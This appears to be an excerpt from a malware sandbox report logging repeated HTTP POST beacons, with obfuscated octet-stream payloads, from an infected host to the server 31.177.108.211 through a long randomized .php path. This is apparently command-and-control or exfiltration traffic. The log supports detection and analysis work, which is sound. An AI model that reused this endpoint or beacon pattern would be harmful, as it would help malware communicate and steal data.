                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          100192.168.2.45677031.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:07.929236889 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:04:08.285631895 CEST2532OUTData Raw: 5b 50 43 56 50 46 59 55 59 5f 51 51 52 58 54 5b 5a 5b 5a 50 55 52 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [PCVPFYUY_QQRXT[Z[ZPURSDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:(,)#:##!>+<![*+4+$07%\<1<('+9[&!^-'
                                          Sep 13, 2024 21:04:08.670831919 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:08.809427977 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:08 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          101192.168.2.45677131.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:08.925497055 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:04:09.270024061 CEST2532OUTData Raw: 5b 55 43 5e 50 40 5c 55 59 5f 51 51 52 5c 54 55 5a 52 5a 50 55 50 53 48 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [UC^P@\UY_QQR\TUZRZPUPSHPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9(,1 !!^4%)1<?[*#(/"Y3$$*/&?&9[&!^-7
                                          Sep 13, 2024 21:04:09.666467905 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:09.820348024 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:09 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          102192.168.2.45677231.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:09.949070930 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:10.301253080 CEST2532OUTData Raw: 5e 51 43 52 55 45 5c 56 59 5f 51 51 52 5f 54 5a 5a 5b 5a 5c 55 55 53 41 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^QCRUE\VY_QQR_TZZ[Z\UUSAPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9@+Y2 !6#3=)]9+?+; V)?>[$ (U%: & Z29[&!^-;
                                          Sep 13, 2024 21:04:10.722986937 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:10.879101038 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:10 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          103192.168.2.45677331.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:11.006936073 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:11.363893032 CEST2532OUTData Raw: 5b 5e 43 54 55 43 5c 50 59 5f 51 51 52 5e 54 56 5a 5c 5a 5f 55 54 53 47 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [^CTUC\PY_QQR^TVZ\Z_UTSGPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+271>4%[((6W=,=)'),6' #%@%/4^2;9[&!^-
                                          Sep 13, 2024 21:04:11.676259995 CEST1236OUTData Raw: 5b 5e 43 54 55 43 5c 50 59 5f 51 51 52 5e 54 56 5a 5c 5a 5f 55 54 53 47 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [^CTUC\PY_QQR^TVZ\Z_UTSGPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+271>4%[((6W=,=)'),6' #%@%/4^2;9[&!^-
                                          Sep 13, 2024 21:04:12.285602093 CEST1236OUTData Raw: 5b 5e 43 54 55 43 5c 50 59 5f 51 51 52 5e 54 56 5a 5c 5a 5f 55 54 53 47 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [^CTUC\PY_QQR^TVZ\Z_UTSGPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+271>4%[((6W=,=)'),6' #%@%/4^2;9[&!^-
                                          Sep 13, 2024 21:04:12.346925020 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:12.347040892 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:12.347305059 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:12.349998951 CEST1296OUTData Raw: 04 3f 17 1a 3d 0b 06 51 3e 39 20 05 24 3c 01 0b 3f 2d 45 5b 31 06 21 3b 09 3c 52 19 37 02 2c 3d 3c 06 2a 3f 3f 07 24 3a 0a 5b 0b 02 32 21 36 30 30 1e 1a 13 3d 04 06 36 05 05 35 3b 3f 05 3b 00 2b 57 0f 41 35 3e 01 1f 02 3b 56 3e 38 04 0c 3a 0b 3d
                                          Data Ascii: ?=Q>9 $<?-E[1!;<R7,=<*??$:[2!600=65;?;+WA5>;V>8:=9<1?='?."Z?U1,\[;8'_S7>+#!,>'6:#^339! V';")9 9V219=Y9!9?$*>]9=&[] #7YYU6V? W91,%Y;;88)2->> >V38._>"?Z-!T!<W


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          104192.168.2.45677431.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:12.719120979 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:13.066958904 CEST2108OUTData Raw: 5b 5f 43 57 55 46 59 5d 59 5f 51 51 52 5f 54 5b 5a 5f 5a 5c 55 5f 53 49 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [_CWUFY]Y_QQR_T[Z_Z\U_SIPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9<<:#&7 *):?<*>8T+Z>'0(U$*#%/19[&!^-;
                                          Sep 13, 2024 21:04:13.454747915 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:13.610995054 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:13 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0a 3c 36 33 56 27 2b 2f 18 38 3e 2e 50 30 3c 23 04 3f 1d 2a 19 3c 03 33 01 2d 5c 3d 03 27 2b 35 58 24 02 2c 01 33 06 27 1b 29 00 2e 46 0d 1d 25 58 3d 01 28 54 3d 00 23 03 30 00 2d 14 20 23 23 5b 27 11 09 1e 23 3f 21 00 20 32 09 55 25 2a 2d 1e 38 36 22 5d 2a 21 21 07 23 26 2e 55 0f 15 39 14 31 21 03 0e 28 1c 2b 1c 29 06 3e 55 25 2f 2b 57 27 28 2b 0b 25 38 3d 0d 24 2c 22 02 25 21 20 02 2b 2e 21 56 22 22 32 56 36 2b 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:<63V'+/8>.P0<#?*<3-\='+5X$,3').F%X=(T=#0- ##['#?! 2U%*-86"]*!!#&.U91!(+)>U%/+W'(+%8=$,"%! +.!V""2V6+'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          105192.168.2.45677531.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:12.839139938 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:13.191783905 CEST2532OUTData Raw: 5e 53 43 50 50 46 59 5c 59 5f 51 51 52 51 54 56 5a 58 5a 5d 55 50 53 49 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^SCPPFY\Y_QQRQTVZXZ]UPSIPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9E?<94"*4U&=;!<<>)+(Z&Y33+2 $/$Z&9[&!^-
                                          Sep 13, 2024 21:04:13.610439062 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:13.748809099 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:13 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          106192.168.2.45677631.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:13.879827023 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:04:14.238812923 CEST2532OUTData Raw: 5b 5e 46 52 50 47 59 56 59 5f 51 51 52 5c 54 53 5a 58 5a 50 55 51 53 42 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [^FRPGYVY_QQR\TSZXZPUQSBPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:<#1!Y#U5X>.=,6)+<<<:$3/&:E%0_19[&!^-7
                                          Sep 13, 2024 21:04:14.622409105 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:14.760302067 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:14 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          107192.168.2.45677731.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:14.881805897 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:15.239337921 CEST2532OUTData Raw: 5e 55 43 51 55 4a 59 56 59 5f 51 51 52 5e 54 57 5a 5a 5a 5d 55 57 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^UCQUJYVY_QQR^TWZZZ]UWS@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9(/17T5_#3Y(82+?.*^+),6$+%\+&?2;9[&!^-
                                          Sep 13, 2024 21:04:15.644181013 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:15.802208900 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:15 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          108192.168.2.45677831.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:15.929012060 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:16.285607100 CEST2532OUTData Raw: 5b 5f 43 55 55 4b 59 54 59 5f 51 51 52 5d 54 5b 5a 59 5a 59 55 54 53 49 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [_CUUKYTY_QQR]T[ZYZYUTSIPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+. ":#3);S?!*;<T<6$#0W&&/$Y'+9[&!^-3
                                          Sep 13, 2024 21:04:16.682226896 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:16.817600965 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:16 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          109192.168.2.45677931.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:16.943732023 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:17.301211119 CEST2532OUTData Raw: 5b 56 46 55 55 47 5c 56 59 5f 51 51 52 5d 54 57 5a 59 5a 51 55 5f 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [VFUUG\VY_QQR]TWZYZQU_SDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9+:Z72%X =]>2T</Z*($W+<X$#%*'B$<<X19[&!^-3
                                          Sep 13, 2024 21:04:17.711360931 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:04:17.864907026 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:04:17 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          110192.168.2.45678031.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:18.020239115 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:18.379332066 CEST2532OUTData Raw: 5b 51 46 54 50 44 5c 57 59 5f 51 51 52 5f 54 56 5a 58 5a 58 55 5e 53 49 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [QFTPD\WY_QQR_TVZXZXU^SIPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9C(X 2:#U=Z=6W<?6*'(/:X'#$&:<& _1;9[&!^-;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          111192.168.2.45678131.177.108.21180
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:04:18.619504929 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:04:18.973134995 CEST2108OUTData Raw: 5b 53 43 53 55 4a 5c 50 59 5f 51 51 52 5e 54 57 5a 59 5a 5d 55 5e 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
